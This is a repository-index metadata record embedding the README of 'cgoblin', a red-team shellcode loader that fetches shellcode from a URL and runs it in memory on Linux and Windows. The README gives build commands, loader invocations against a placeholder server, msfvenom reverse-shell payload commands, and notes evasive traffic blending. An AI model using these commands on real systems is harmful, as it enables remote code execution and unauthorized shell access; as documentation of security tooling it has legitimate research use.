{"id":30130778,"url":"https://github.com/grisuno/cgoblin","last_synced_at":"2026-04-27T16:31:29.517Z","repository":{"id":307778551,"uuid":"1030677357","full_name":"grisuno/cgoblin","owner":"grisuno","description":"cgoblin run shellcode from an url in windows and linux","archived":false,"fork":false,"pushed_at":"2025-09-01T00:48:03.000Z","size":72,"stargazers_count":3,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-09-01T02:38:15.452Z","etag":null,"topics":["hacking","lazyown","linux","msfvenom-friendly","multiplatform","redteam","remote","shellcode","shellcode-loader","windows"],"latest_commit_sha":null,"homepage":"https://grisuno.github.io/LazyOwn/","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/grisuno.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-08-02T05:00:00.000Z","updated_at":"2025-09-01T00:48:07.000Z","dependencies_parsed_at":"2025-08-02T08:06:40.596Z","dependency_job_id":"86ae46bc-dbeb-4305-a171-4f886ac00c17","html_url":"https://github.com/grisuno/cgoblin","commit_stats":null,"previous_names":["grisuno/cgoblin"],"tags_count":0,"template":false,"template_full_name":"grisuno/template","purl":"pkg:github/grisuno/cgoblin","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/grisuno%2Fcgoblin","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/grisuno%2Fcgoblin/ta
gs","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/grisuno%2Fcgoblin/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/grisuno%2Fcgoblin/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/grisuno","download_url":"https://codeload.github.com/grisuno/cgoblin/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/grisuno%2Fcgoblin/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32345802,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-26T23:26:28.701Z","status":"online","status_checked_at":"2026-04-27T02:00:06.769Z","response_time":128,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["hacking","lazyown","linux","msfvenom-friendly","multiplatform","redteam","remote","shellcode","shellcode-loader","windows"],"created_at":"2025-08-10T18:05:00.252Z","updated_at":"2026-04-27T16:31:29.510Z","avatar_url":"https://github.com/grisuno.png","language":"Go","funding_links":["https://patreon.com/LazyOwn","https://ko-fi.com/Y8Y2Z73AV"],"categories":[],"sub_categories":[],"readme":"# 🧌 CGOblin – Cross-Platform Shellcode Loader\n\n\u003cimg width=\"1024\" height=\"1024\" alt=\"cgoblin\" src=\"https://github.com/user-attachments/assets/900668cf-cb18-4ef2-bab5-20aadcf01a36\" /\u003e\n\n**cgoblin** is a lightweight, cross-platform shellcode loader written in Go, 
capable of fetching and executing shellcode from a remote URL on both **Linux** and **Windows** systems. It leverages inline C via CGO to allocate executable memory and run position-independent machine code.\n\n\u003e 🔒 *For educational and red teaming purposes only.*\n\n\u003cimg width=\"689\" height=\"887\" alt=\"image\" src=\"https://github.com/user-attachments/assets/541df9f7-914b-4a89-b5e3-695c3d004a7c\" /\u003e\n\n\n---\n\n## 📦 Repository\n\n- **URL**: [https://github.com/grisuno/cgoblin.git](https://github.com/grisuno/cgoblin.git)\n- **Author**: [grisuno](https://github.com/grisuno)\n- **Team**: LazyOwn RedTeam\n\n---\n\n## 🚀 Features\n\n- ✅ Cross-platform support (Linux \u0026 Windows)\n- ✅ Remote shellcode loading via HTTP(S)\n- ✅ Shellcode parsing from `\\xNN` hex format\n- ✅ Memory allocation with execution permissions:\n  - Uses `mmap()` on Linux\n  - Uses `VirtualAlloc()` on Windows\n- ✅ Minimal footprint and no disk staging (in memory only)\n- ✅ Custom User-Agent and secure HTTP client settings\n\n---\n\u003cimg width=\"1515\" height=\"541\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f2852e22-0121-4c3c-96c6-58774579c703\" /\u003e\n\n## Prerequisites\n**CGOblin** requires a multi-language development environment supporting both Go and Python, with CGO compilation capabilities for system-level memory operations.\n\n### Core Requirements\n\n| Component | Version | Purpose |\n|---|---|---|\n| Go | 1.24.2+ | Core application runtime and compilation |\n| Python | 3.x | Launcher script and development utilities [OPTIONAL] |\n| CGO | Enabled | System call interface for memory operations |\n| GCC/Clang | Latest | C compiler for CGO compilation |\n\n## 🛠️ Usage\n\n\u003cimg width=\"691\" height=\"869\" alt=\"image\" src=\"https://github.com/user-attachments/assets/8cb716c2-8193-4ab3-99b0-dc4de0b5479c\" /\u003e\n\n\n### Build\n\n\u003cimg width=\"857\" height=\"442\" alt=\"image\" src=\"https://github.com/user-attachments/assets/c9297511-7fe5-4708-aef7-adbb0eefa739\" 
/\u003e\n\n\n```bash\n# Linux\nGOOS=linux go build -o loader_linux main.go loader_linux.go\n```\n\n```bash\n# Windows\nGOOS=windows GOARCH=amd64 CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc go build -o loader_windows.exe\n```\n\n\u003cimg width=\"654\" height=\"851\" alt=\"image\" src=\"https://github.com/user-attachments/assets/88f85131-f90f-4197-a64a-9b8ad619043f\" /\u003e\n\n💡 Ensure CGO is enabled: `CGO_ENABLED=1` (default when supported).\n\n```bash\n# Linux\n# Example\n./loader_linux -url http://your-server.com/shellcode.txt\n```\n\n\u003cimg width=\"1632\" height=\"780\" alt=\"image\" src=\"https://github.com/user-attachments/assets/20f636d1-1eaf-4cf1-bbbb-0be9cb821e6c\" /\u003e\n\n\n```bash\n# Windows\n# Example\npowershell .\\loader_windows.exe -url http://your-server.com/shellcode.txt\n```\n\n\u003cimg width=\"1058\" height=\"630\" alt=\"image\" src=\"https://github.com/user-attachments/assets/a5f04378-bdd6-417e-941c-fd6217afd123\" /\u003e\n\n```c\n// shellcode\n// Example\nunsigned char buf[] = \"\\x6a\\x29\\x58\\x99\\x...\";\n```\n\n⚠️ The loader parses only sequences matching `\\x..` and ignores everything else. 
\n\n\u003cimg width=\"331\" height=\"873\" alt=\"image\" src=\"https://github.com/user-attachments/assets/9c92957f-c060-47f5-865f-a01c8e5a767b\" /\u003e \u003cimg width=\"358\" height=\"815\" alt=\"image\" src=\"https://github.com/user-attachments/assets/af8fc684-ccc7-47b8-a0d5-ebec36decb79\" /\u003e\n\n```bash\n# shellcode \n# Example Linux\nmsfvenom -p linux/x64/shell_reverse_tcp LHOST={lhost} LPORT={lport} -f c -o shellcode_test.txt \n```\n```bash\n# shellcode \n# Example Windows\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST={lhost} LPORT={lport} -f c -o shellcode_test.txt\n```\n\n```text\n# Tree\n# Example\n.\n├── go.mod               # Go module definition\n├── main.go              # Entry point with CLI flag parsing\n├── loader_linux.go      # Linux-specific execution logic (CGO + mmap)\n├── loader_windows.go    # Windows-specific execution logic (CGO + VirtualAlloc)\n├── shellcode_linux.txt  # Example Linux shellcode (bind/reverse shell)\n└── shellcode_win.txt    # Example Windows shellcode (e.g., Calc or Cmd)\n```\n\n📝 Example shellcode files are provided for testing (non-malicious use recommended). 
\n\n## 🧪 Testing Safely\nTo test without risk:\n\n- Host a simple shellcode (e.g., `execve(\"/bin/sh\")` on Linux or `WinExec(\"calc.exe\")` on Windows).\n- Use a local HTTP server:\n\n```bash\n# Webserver\n# Example\npython3 -m http.server 8000\n```\n\n## Security and Operational Considerations\ncgoblin implements several security-conscious design patterns:\n\n- Memory-only operations: No temporary files are created during shellcode processing\n- Custom HTTP headers: Configurable User-Agent strings to blend with legitimate traffic\n- Input validation: Shellcode size limits and format verification\n- Platform isolation: Platform-specific code paths prevent cross-contamination\n- CGO safety: Proper memory management in C interface layers\n\n## External Framework Integration\n### Purpose and Scope\nThis document covers how **CGOblin** integrates with external exploitation frameworks and automation systems. The integration system allows external tools to automatically configure, build, and execute the shellcode loader with dynamically generated payloads. This capability enables **CGOblin** to function as a component within larger penetration testing suites and automated exploitation frameworks.\n\nFor information about the core shellcode loading functionality, see Core Shellcode Loader System. For details about the build system that supports framework integration, see Build System.\n\n### Framework Integration Architecture\nThe external framework integration system uses a YAML-based configuration approach that defines how external tools can interact with **CGOblin**. The integration supports parameter-driven payload generation and automated execution workflows.\n\n## 🛑 Disclaimer\nThis tool is intended for:\n\n- Security research\n- Red team operations\n- Authorized penetration testing\n\nDo not use for unauthorized access or malicious purposes. 
The author and team assume no liability for misuse.\n\n## Compliance Framework\nUsers of cgoblin must ensure compliance with:\n\n- Local Computer Crime Laws: Unauthorized access laws vary by jurisdiction\n- Professional Ethics: Penetration testing codes of conduct\n- Contractual Obligations: Scope limitations in security assessments\n- Data Protection Regulations: Privacy laws when handling target systems\n\n\n## 🤝 Team: LazyOwn RedTeam\nA dedicated red team focused on offensive security, exploit development, and defensive evasion techniques.\n\n\"We break it to make it better — ethically.\" \n\n## 📄 License\nThis project is open-source for educational use. See LICENSE for details (**GPLv3**).\n\n\n# Links\n-    [+] **gomulti_loader** the little brother of **CGOblin**: [https://github.com/grisuno/gomulti_loader](https://github.com/grisuno/gomulti_loader)\n-    [+] Shorts: [https://www.youtube.com/shorts/kPZvVV_RNIE](https://www.youtube.com/shorts/kPZvVV_RNIE)\n-    [+] Deepwiki: [https://deepwiki.com/grisuno/cgoblin](https://deepwiki.com/grisuno/cgoblin)\n-    [+] Github: [https://github.com/grisuno/LazyOwn](https://github.com/grisuno/LazyOwn)\n-    [+] Web: [https://grisuno.github.io/LazyOwn/](https://grisuno.github.io/LazyOwn/)\n-    [+] Reddit: [https://www.reddit.com/r/LazyOwn/](https://www.reddit.com/r/LazyOwn/)\n-    [+] Facebook: [https://web.facebook.com/profile.php?id=61560596232150](https://web.facebook.com/profile.php?id=61560596232150)\n-    [+] HackTheBox: [https://app.hackthebox.com/teams/overview/6429](https://app.hackthebox.com/teams/overview/6429)\n-    [+] Grisun0: [https://app.hackthebox.com/users/1998024](https://app.hackthebox.com/users/1998024)\n-    [+] Patreon: [https://patreon.com/LazyOwn](https://patreon.com/LazyOwn)\n-    [↙] Download: [https://github.com/grisuno/LazyOwn/archive/refs/tags/release/0.2.47.tar.gz ](https://github.com/grisuno/LazyOwn/archive/refs/tags/release/0.2.58.tar.gz 
)\n\n![Python](https://img.shields.io/badge/python-3670A0?style=for-the-badge\u0026logo=python\u0026logoColor=ffdd54) ![Shell Script](https://img.shields.io/badge/shell_script-%23121011.svg?style=for-the-badge\u0026logo=gnu-bash\u0026logoColor=white) ![Flask](https://img.shields.io/badge/flask-%23000.svg?style=for-the-badge\u0026logo=flask\u0026logoColor=white) [![License: GPL v3](https://img.shields.io/badge/License-GPLv3-blue.svg)](https://www.gnu.org/licenses/gpl-3.0)\n\n[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y2Z73AV)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgrisuno%2Fcgoblin","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fgrisuno%2Fcgoblin","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgrisuno%2Fcgoblin/lists"}